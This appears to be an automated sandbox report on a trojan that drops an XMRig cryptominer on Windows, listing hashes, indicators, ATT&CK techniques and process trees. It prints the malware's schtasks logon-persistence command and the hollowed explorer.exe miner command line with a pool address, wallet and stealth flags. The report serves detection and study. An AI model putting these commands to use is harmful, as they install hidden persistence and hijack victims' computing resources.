xmrig | d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

Analysis

max time kernel
132s
max time network
129s
platform
windows7_x64
resource
win7v20210410
submitted
16-07-2021 16:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
Size

2.1MB
MD5

73ab4524d40fd3f991dd0b12646772e1
SHA1

f1391279800f539282edaf04f636642d6569a7d8
SHA256

d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6
SHA512

4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/1988-93-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

Processes:

sihost64.exeServices64System.exesihost64.exe

pid process

396 sihost64.exe
1128 Services64System.exe
1572 sihost64.exe
Loads dropped DLL 3 IoCs

Processes:

SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exe

pid process

768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
768 SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
1128 Services64System.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

Services64System.exe

description pid process target process

PID 1128 set thread context of 1988 1128 Services64System.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

832 schtasks.exe
1652 schtasks.exe

pid	process
396	sihost64.exe
1128	Services64System.exe
1572	sihost64.exe

description	pid	process	target process
PID 1128 set thread context of 1988	1128	Services64System.exe	explorer.exe

pid	process
832	schtasks.exe
1652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exe

pid	process
768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
1128	Services64System.exe
1128	Services64System.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exeServices64System.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
Token: SeDebugPrivilege	1128	Services64System.exe
Token: SeLockMemoryPrivilege	1988	explorer.exe
Token: SeLockMemoryPrivilege	1988	explorer.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.execmd.exeServices64System.execmd.exe

description	pid	process	target process
PID 768 wrote to memory of 1368	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	cmd.exe
PID 768 wrote to memory of 1368	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	cmd.exe
PID 768 wrote to memory of 1368	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	cmd.exe
PID 1368 wrote to memory of 832	1368	cmd.exe	schtasks.exe
PID 1368 wrote to memory of 832	1368	cmd.exe	schtasks.exe
PID 1368 wrote to memory of 832	1368	cmd.exe	schtasks.exe
PID 768 wrote to memory of 396	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	sihost64.exe
PID 768 wrote to memory of 396	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	sihost64.exe
PID 768 wrote to memory of 396	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	sihost64.exe
PID 768 wrote to memory of 1128	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	Services64System.exe
PID 768 wrote to memory of 1128	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	Services64System.exe
PID 768 wrote to memory of 1128	768	SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe	Services64System.exe
PID 1128 wrote to memory of 1220	1128	Services64System.exe	cmd.exe
PID 1128 wrote to memory of 1220	1128	Services64System.exe	cmd.exe
PID 1128 wrote to memory of 1220	1128	Services64System.exe	cmd.exe
PID 1220 wrote to memory of 1652	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 1652	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 1652	1220	cmd.exe	schtasks.exe
PID 1128 wrote to memory of 1572	1128	Services64System.exe	sihost64.exe
PID 1128 wrote to memory of 1572	1128	Services64System.exe	sihost64.exe
PID 1128 wrote to memory of 1572	1128	Services64System.exe	sihost64.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe
PID 1128 wrote to memory of 1988	1128	Services64System.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.17987.1681.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
3⤵
- Creates scheduled task(s)
PID:832

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
2⤵
- Executes dropped EXE
PID:396

C:\Users\Admin\AppData\Roaming\Services64System.exe
"C:\Users\Admin\AppData\Roaming\Services64System.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services64System" /tr '"C:\Users\Admin\AppData\Roaming\Services64System.exe"'
4⤵
- Creates scheduled task(s)
PID:1652

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
PID:1572

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:4444 --user=45xUdHPiFHQ7xbKh19G45saF1raB2ot5pag8p1Hnk4yrfXRJZskr8TMbFpVfC5tDk8eQQg63TqkW9gKhwagx6HePTaK2yXb --pass= --cpu-max-threads-hint=0 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --cinit-stealth
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
C:\Users\Admin\AppData\Roaming\Services64System.exe
MD5
73ab4524d40fd3f991dd0b12646772e1

SHA1
f1391279800f539282edaf04f636642d6569a7d8

SHA256
d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

SHA512
4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

Download Submit
C:\Users\Admin\AppData\Roaming\Services64System.exe
MD5
73ab4524d40fd3f991dd0b12646772e1

SHA1
f1391279800f539282edaf04f636642d6569a7d8

SHA256
d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

SHA512
4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
e5e9669aa667d6e2b8298fe086ec0026

SHA1
133e5cd7196fb848ed4139573c2b62b3cb243814

SHA256
82258b62b5fb1a5a79fd5ed1abcd7c59be86ab9288f3bca5faf41ac8de7b2b11

SHA512
86e7224d1ca6222b4ef90af4a3445dd13a2c5c7291476ae1ec0fe70554c29fad4da07c584058cdd7fea9a4220fb383284094ecd17bf2ea3866a1903894205f97

Download Submit
\Users\Admin\AppData\Roaming\Services64System.exe
MD5
73ab4524d40fd3f991dd0b12646772e1

SHA1
f1391279800f539282edaf04f636642d6569a7d8

SHA256
d765cca6a80ac3e18801b578cb3eacae5a35c4c45b365e5d02d2c17a48fb23d6

SHA512
4cb98b37d7ad25bc316d2f5fa64a3c59aa2f71365d0bcab471318646041558317bf85a5b2b0cddf1a6d52a4c268a519b37fa3560ae5d9d057cbc21501ec5226b

Download Submit
memory/396-78-0x0000000000650000-0x0000000000652000-memory.dmp

Filesize
8KB

Download
memory/396-74-0x000000013FF00000-0x000000013FF01000-memory.dmp

Filesize
4KB

Download
memory/396-67-0x0000000000000000-mapping.dmp

Download
memory/396-80-0x000000001ADC0000-0x000000001ADC2000-memory.dmp

Filesize
8KB

Download
memory/768-60-0x000000013F500000-0x000000013F501000-memory.dmp

Filesize
4KB

Download
memory/768-63-0x000000001BA90000-0x000000001BA92000-memory.dmp

Filesize
8KB

Download
memory/768-62-0x000000001C2D0000-0x000000001C4EC000-memory.dmp

Filesize
2.1MB

Download
memory/832-65-0x0000000000000000-mapping.dmp

Download
memory/1128-75-0x000000013F920000-0x000000013F921000-memory.dmp

Filesize
4KB

Download
memory/1128-71-0x0000000000000000-mapping.dmp

Download
memory/1128-81-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/1128-91-0x0000000002410000-0x000000000241A000-memory.dmp

Filesize
40KB

Download
memory/1220-82-0x0000000000000000-mapping.dmp

Download
memory/1368-64-0x0000000000000000-mapping.dmp

Download
memory/1572-89-0x000000013F5F0000-0x000000013F5F1000-memory.dmp

Filesize
4KB

Download
memory/1572-85-0x0000000000000000-mapping.dmp

Download
memory/1572-101-0x000000001BA50000-0x000000001BA52000-memory.dmp

Filesize
8KB

Download
memory/1652-83-0x0000000000000000-mapping.dmp

Download
memory/1988-94-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1988-93-0x00000001402EB66C-mapping.dmp

Download
memory/1988-95-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1988-96-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/1988-97-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/1988-98-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/1988-99-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/1988-92-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download